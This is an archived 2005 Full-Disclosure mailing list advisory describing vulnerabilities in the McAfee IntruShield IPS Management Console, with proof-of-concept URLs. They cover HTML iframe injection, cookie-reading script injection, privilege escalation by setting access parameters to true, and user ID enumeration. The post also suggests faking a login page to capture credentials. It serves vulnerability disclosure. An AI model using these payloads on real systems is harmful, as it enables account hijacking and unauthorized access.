lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed Jul  6 15:39:13 2005
From: c0ntexb at gmail.com (c0ntex)
Subject: McAfee Intrushield IPS Abuse

 /*
*****************************************************************************************************************
$ An open security advisory #8 - McAfee Intrushield IPS Management Console 
Abuse
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 06 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Local / Remote
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial 
gain.
*****************************************************************************************************************

McAfee IntruShield Security Management System
http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm


"The McAfee IntruShield Security Management System is an advanced solution 
for administering IntruShield
sensor appliance deployments. The IntruShield Security Management System 
(ISM) can support both large and
small network intrusion prevention system (IPS) deployments and can scale up 
to several hundred sensor
appliances. By integrating a comprehensive set of Best-in-Class security 
management functions, the
IntruShield Security Management System dramatically simplifies and 
streamlines the complexities associated
with IPS configuration, policy compliance, and threat and response 
management."

I have found some security vulnerabilities in this product whereby a user 
can elevate their privileges from
a user that can only view alerts logged by remote sensors, to a scenario 
where the user can gain access to
acknowledge, accept and delete alerts and access the Management Console. It 
is also possible to inject
malicious HTML and JavaScript into the URLS and have this malicious script 
run on the clients machine,
allowing for account information hijacking.

A new version has been released to address these bugs and can be downloaded 
from their site.

*/

Issues: 
1) Inject HTML
2) Inject JavaScript
3) Access privileged reports
4) Acknowledge and delete alerts
5) Gain access to Management Console

Note: for issues 1 - 4, the attacker needs a valid user account.

1) It is possible to embed HTML into the MISMS. This could potentially allow 
phishing attacks to be performed
against a valid Manager account.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&
topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="
http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600
>
</iframe>&severity=critical&count=1


2) It is possible to embed JavaScript into the MISMS and have the embedded 
script execute in the security
context of the user browsing the Management System.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
domainName=Demo&resourceName=<script>alert("There could be trouble 
ahead")</script><script>alert(document.cookie)
</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=
Critical&severity=critical&count=1


3) It is possible to access the restricted "Generate Reports" section of the 
MISMS and as such, a non-privileged
user can gain important information regarding the configuration and set-up 
of the IP devices being managed by the
Service. This can be achieved by simply changing the Access option from 
false to true.

https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&
selectedDomain=0&fullAccessRight=true


4) It is possible to acknowledge, de-acknowledge and delete alerts from the 
MISMS console by modifying URL's
sent to the system by simply changing the Access option from false to true.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&
domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&
topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=
critical&count=1

Each change is emailed out to the administrator, however the email only says 
that "someone" made a change.

5) As default, all user ID values are passed in the URL in the clear, 
meaning that it is trivial for an attacker
to brute force accounts until a privileged Manager account is found. An 
example of this would look similar to:

https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif

This process can be continued until a valid user ID has been found with 
privileges to access the configure screen.

Since javascript can be run in the browsers of clients accessing the device, 
it would be possible to redraw the page
with IFRAME's and recreate the user login page to snoop usersnames and 
passwords.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050706/67388fbd/attachment.html

Powered by blists - more mailing lists